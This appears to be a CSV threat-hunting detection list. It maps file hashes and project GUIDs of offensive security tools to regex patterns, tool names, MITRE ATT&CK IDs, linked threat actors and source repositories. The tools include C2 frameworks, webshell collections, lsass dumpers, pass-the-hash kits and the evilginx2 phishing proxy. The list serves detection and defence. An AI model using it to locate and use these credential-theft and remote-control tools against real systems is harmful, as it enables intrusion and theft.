"*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27330"
"*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27331"
"*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27332"
"*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27333"
"*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27334"
"*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27335"
"*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27336"
"*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27337"
"*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27338"
"*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27339"
"*5B5EF20C-9289-4E78-A8AF-2D30E44CF4F1*",".{0,1000}5B5EF20C\-9289\-4E78\-A8AF\-2D30E44CF4F1.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27340"
"*5b5f70992a0d5a59176a7bfb43401d56ab3d250958378f1d913405040bf7cf54*",".{0,1000}5b5f70992a0d5a59176a7bfb43401d56ab3d250958378f1d913405040bf7cf54.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","27341"
"*5b6250d39e2f2855743616842353bab496aafcb7bc2a45169a54bc94f7939917*",".{0,1000}5b6250d39e2f2855743616842353bab496aafcb7bc2a45169a54bc94f7939917.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27342"
"*5b64c12376f1ec1b876ede9b84f6883ee5f1ee5065e945dc2115c5e04c02aadf*",".{0,1000}5b64c12376f1ec1b876ede9b84f6883ee5f1ee5065e945dc2115c5e04c02aadf.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","#filehash","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","27343"
"*5b6868ca1b71f60e801421d7f1629422c0e894bf3c4d0d45778a483ca3d8a41a*",".{0,1000}5b6868ca1b71f60e801421d7f1629422c0e894bf3c4d0d45778a483ca3d8a41a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27345"
"*5b71bad75d676d0520ed50ea05534dcfb748c19b68232adb5c5f3d9035814de6*",".{0,1000}5b71bad75d676d0520ed50ea05534dcfb748c19b68232adb5c5f3d9035814de6.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","27346"
"*5b77f324911a4a03654a78e1e870968a7d61e9ea07435bcc9d47891523677226*",".{0,1000}5b77f324911a4a03654a78e1e870968a7d61e9ea07435bcc9d47891523677226.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27347"
"*5b989ce585f0c93fd67cc305fcf195755c498f19f5437151b9ce371460f6ab56*",".{0,1000}5b989ce585f0c93fd67cc305fcf195755c498f19f5437151b9ce371460f6ab56.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","27355"
"*5b9dfce5f5a8bb0e00e99a77f8c7197742651de267b0e9438d54d9ba9f1137b4*",".{0,1000}5b9dfce5f5a8bb0e00e99a77f8c7197742651de267b0e9438d54d9ba9f1137b4.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs -  detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","#filehash","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","27357"
"*5b9e669bea90a5dacd7c2432e9d02f1a66d7ed4d531df6c2870cc3238847193c*",".{0,1000}5b9e669bea90a5dacd7c2432e9d02f1a66d7ed4d531df6c2870cc3238847193c.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","27358"
"*5ba1b5f60649f253556fa044849ea7af38cef5337c5061f06004687e0862d6c3*",".{0,1000}5ba1b5f60649f253556fa044849ea7af38cef5337c5061f06004687e0862d6c3.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","27359"
"*5ba530ebd87d7cb1bc0a2a368bdab568bf533a4da5399428feadc79a7947eb9d*",".{0,1000}5ba530ebd87d7cb1bc0a2a368bdab568bf533a4da5399428feadc79a7947eb9d.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","27360"
"*5ba6551843aaa623f0acd46941837e7dfde53ebbb648187a7f92efd211909d4f*",".{0,1000}5ba6551843aaa623f0acd46941837e7dfde53ebbb648187a7f92efd211909d4f.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","27361"
"*5ba7b38fa738e9bf7007d5f104c3437e15b9fa6b05e21f9383d52f888d6c7de3*",".{0,1000}5ba7b38fa738e9bf7007d5f104c3437e15b9fa6b05e21f9383d52f888d6c7de3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27362"
"*5bb0b56e047e1453a3695ec0b9478b84*",".{0,1000}5bb0b56e047e1453a3695ec0b9478b84.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","27365"
"*5bb73e9a41ee1e8ead70ed9fd3e9e7f0a253e84cb441b8c7889825364b62041e*",".{0,1000}5bb73e9a41ee1e8ead70ed9fd3e9e7f0a253e84cb441b8c7889825364b62041e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27367"
"*5bb980340a76e2f2ee12af9345d5662a84cc013346746c6fb6c8271e201ac9d2*",".{0,1000}5bb980340a76e2f2ee12af9345d5662a84cc013346746c6fb6c8271e201ac9d2.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27368"
"*5bbc850a274b933a4e8b0ac7d5bc8b0527c3eddbaee7f8a9389c284f27a6fe14*",".{0,1000}5bbc850a274b933a4e8b0ac7d5bc8b0527c3eddbaee7f8a9389c284f27a6fe14.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","27369"
"*5bcac0a74645424d26b217b7725be826b7d558ecbce7ec5d3072d802e1834181*",".{0,1000}5bcac0a74645424d26b217b7725be826b7d558ecbce7ec5d3072d802e1834181.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","27370"
"*5bd91a94ce7fab7461d6d88c603d94501bf3f7c8865a3a5045d8caa39d82ebe2*",".{0,1000}5bd91a94ce7fab7461d6d88c603d94501bf3f7c8865a3a5045d8caa39d82ebe2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27375"
"*5be325905df8aab7089ab2348d89343f55a2f88dadd75de8f382e8fa026451bd*",".{0,1000}5be325905df8aab7089ab2348d89343f55a2f88dadd75de8f382e8fa026451bd.{0,1000}","offensive_tool_keyword","MailPassView","Mail PassView is a small password-recovery tool that reveals the passwords and other account details for multiple email clients","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - Kimsuky - Evilnum - XDSpy","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","27378"
"*5be325905df8aab7089ab2348d89343f55a2f88dadd75de8f382e8fa026451bd*",".{0,1000}5be325905df8aab7089ab2348d89343f55a2f88dadd75de8f382e8fa026451bd.{0,1000}","offensive_tool_keyword","MailPassView","Mail PassView is a small password-recovery tool that reveals the passwords and other account details for multiple email clients","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - Kimsuky - Evilnum - XDSpy","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","27379"
"*5be6fef49d21ddd81cfd1a8076c04385568d5120f20e0451bf4aaab0796e1656*",".{0,1000}5be6fef49d21ddd81cfd1a8076c04385568d5120f20e0451bf4aaab0796e1656.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","27380"
"*5be7ac60cb04f99ae1e563f21289ae608b3dfdd2e79becbeef1a611e9a7bf186*",".{0,1000}5be7ac60cb04f99ae1e563f21289ae608b3dfdd2e79becbeef1a611e9a7bf186.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27381"
"*5bfec4da2bd86d19199d74b0b95f044a2dc4ef0fc40941315b0d0ac49e6fb890*",".{0,1000}5bfec4da2bd86d19199d74b0b95f044a2dc4ef0fc40941315b0d0ac49e6fb890.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","27386"
"*5c0e2b1e7facf950cf245eca4c1c5533d9d7bfbeb804d1aa18f304fe1fcf5aed*",".{0,1000}5c0e2b1e7facf950cf245eca4c1c5533d9d7bfbeb804d1aa18f304fe1fcf5aed.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27390"
"*5c177feedd58a6ccc8287dee8c767dd486f2b5c55c234360be17f85fcbaa4501*",".{0,1000}5c177feedd58a6ccc8287dee8c767dd486f2b5c55c234360be17f85fcbaa4501.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","#filehash","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","27392"
"*5c19bc2cac0c45c991371aa4395e31e8ac7104d807cf8d1c2c3ff1f8b5e535f7*",".{0,1000}5c19bc2cac0c45c991371aa4395e31e8ac7104d807cf8d1c2c3ff1f8b5e535f7.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27393"
"*5c1ced06b49c8595e1191004994c0b82de8eef82559776faa1dba19240c76dc0*",".{0,1000}5c1ced06b49c8595e1191004994c0b82de8eef82559776faa1dba19240c76dc0.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","27394"
"*5c257d91b3148cd1c64613a7e1fb1902ba092a964777f6ea4aac6884b6c2f542*",".{0,1000}5c257d91b3148cd1c64613a7e1fb1902ba092a964777f6ea4aac6884b6c2f542.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27397"
"*5c2a6754f5b9e92a49dfb22ce0644d0e4afaecc5b7a8d7e4714dfb578917c7d8*",".{0,1000}5c2a6754f5b9e92a49dfb22ce0644d0e4afaecc5b7a8d7e4714dfb578917c7d8.{0,1000}","offensive_tool_keyword","keywa7","The tool that bypasses the firewall's Application Based Rules and lets you connect to anywhere","T1090.001 - T1071.004 - T1071.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/keywa7/keywa7","1","0","#filehash","N/A","6","1","61","9","2024-08-19T08:09:33Z","2024-08-05T15:27:26Z","27398"
"*5c35b47cb32378235e9df3c1d9a07700d4c49011532781cda0c0a8fafb4927ec*",".{0,1000}5c35b47cb32378235e9df3c1d9a07700d4c49011532781cda0c0a8fafb4927ec.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27401"
"*5c3a2b52076490d4dbcff0a880931e52fe492e253e003961bae52c99e23d25b0*",".{0,1000}5c3a2b52076490d4dbcff0a880931e52fe492e253e003961bae52c99e23d25b0.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#filehash","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","27402"
"*5C3AD9AC-C62C-4AA8-BAE2-9AF920A652E3*",".{0,1000}5C3AD9AC\-C62C\-4AA8\-BAE2\-9AF920A652E3.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","#GUIDproject","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","27403"
"*5c426f2a95c86e28b4d2944fce78541c0956fe45eb0b1b728aefe976773b4431*",".{0,1000}5c426f2a95c86e28b4d2944fce78541c0956fe45eb0b1b728aefe976773b4431.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","27406"
"*5c4edaafc9e7a3e8aa07634eeb901be2b64b899a9fa018b5ceb4cb800f750d9f*",".{0,1000}5c4edaafc9e7a3e8aa07634eeb901be2b64b899a9fa018b5ceb4cb800f750d9f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27410"
"*5c560a9be9b74ebc5a006a808c82813eeb5c7d7dcff5d1c34be4fb1fba562535*",".{0,1000}5c560a9be9b74ebc5a006a808c82813eeb5c7d7dcff5d1c34be4fb1fba562535.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","27411"
"*5c575e2b8caaac3ca42bbe9f7332d822d972ff09afb6afdea8561e929c35d922*",".{0,1000}5c575e2b8caaac3ca42bbe9f7332d822d972ff09afb6afdea8561e929c35d922.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27412"
"*5c59a42bf1ad7c424f6c337cc11e40ed0d8d365c57378df1e5f5613223e4c1ea*",".{0,1000}5c59a42bf1ad7c424f6c337cc11e40ed0d8d365c57378df1e5f5613223e4c1ea.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27414"
"*5c5bd260c00111edc55b4bc8a82d72e0a510f738ce3696ab2bbcd4a38a84bb12*",".{0,1000}5c5bd260c00111edc55b4bc8a82d72e0a510f738ce3696ab2bbcd4a38a84bb12.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27415"
"*5c5dc6546877d616c4479df133654a0fbccc71d5279aa63f2ca560a5abfea31d*",".{0,1000}5c5dc6546877d616c4479df133654a0fbccc71d5279aa63f2ca560a5abfea31d.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","#filehash","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","27416"
"*5c611fb030683dba08662997836b3b308c0278130bf2eee6ac6af6a4332285fe*",".{0,1000}5c611fb030683dba08662997836b3b308c0278130bf2eee6ac6af6a4332285fe.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","#filehash","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","27418"
